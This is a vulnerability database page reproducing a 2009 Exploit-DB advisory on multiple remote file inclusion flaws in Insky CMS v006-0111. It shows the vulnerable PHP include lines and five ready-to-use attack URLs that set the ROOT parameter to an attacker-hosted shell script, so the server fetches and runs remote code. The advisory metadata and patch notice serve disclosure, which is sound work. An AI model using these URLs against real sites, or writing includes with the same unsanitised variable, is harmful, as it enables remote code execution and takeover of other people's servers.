header-logo
Suggest Exploit
vendor:
Insky CMS
by:
mat
9,3
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Insky CMS
Affected Version From: v006-0111
Affected Version To: v006-0111
Patch Exists: YES
Related CWE: N/A
CPE: a:insky:insky_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Insky CMS v006-0111 Multiple Remote File Include Vulnerability

Insky CMS v006-0111 is vulnerable to multiple Remote File Include vulnerabilities. Attackers can exploit these vulnerabilities by sending a maliciously crafted HTTP request to the vulnerable application. This can allow attackers to execute arbitrary code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of Insky CMS.
Source

Exploit-DB raw data:

        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Insky CMS v006-0111 Multiple Remote File Include Vulnerability
Script: http://code.google.com/p/insky/downloads/list
Author: mat
Mail: rahmat_punk@hotmail.com
---------------Ooooo------------------------------------------------
               (   )
      ooooO     ) /
      (   )    (_/
       \ (
        \_)

Vuln Code 

<?...
  require_once $ROOT."/insky/class/ext/js/class.js.php";
...?>

          (insky/modules/city.get/city.get.php)
          (insky/modules/city.get/index.php)
          (insky/modules/message2.send/message.send.php)
          (insky/modules/message.send/message.send.php)


<?...
  require_once($ROOT."/insky/class/ext/wiki/parserutils.php");
  require_once($ROOT.'/insky/wysiwyg/config.php');
  require_once($ROOT.'/insky/wysiwyg/editor_class.php');
...?>

          (insky/modules/pages.add/pages.add.php)

Usage: http://[target]/[path]/modules/city.get/city.get.php?ROOT=http://[shellscript]
       http://[target]/[path]/modules/city.get/index.php?ROOT=http://[shellscript]
       http://[target]/[path]/modules/message2.send/message.send.php?ROOT=http://[shellscript]
       http://[target]/[path]/modules/message.send/message.send.php?ROOT=http://[shellscript]
       http://[target]/[path]/modules/pages.add/pages.add.php?ROOT=http://[shellscript]

Greetings: All Hackerz

Navigation

Suggest Exploit

Services By CQR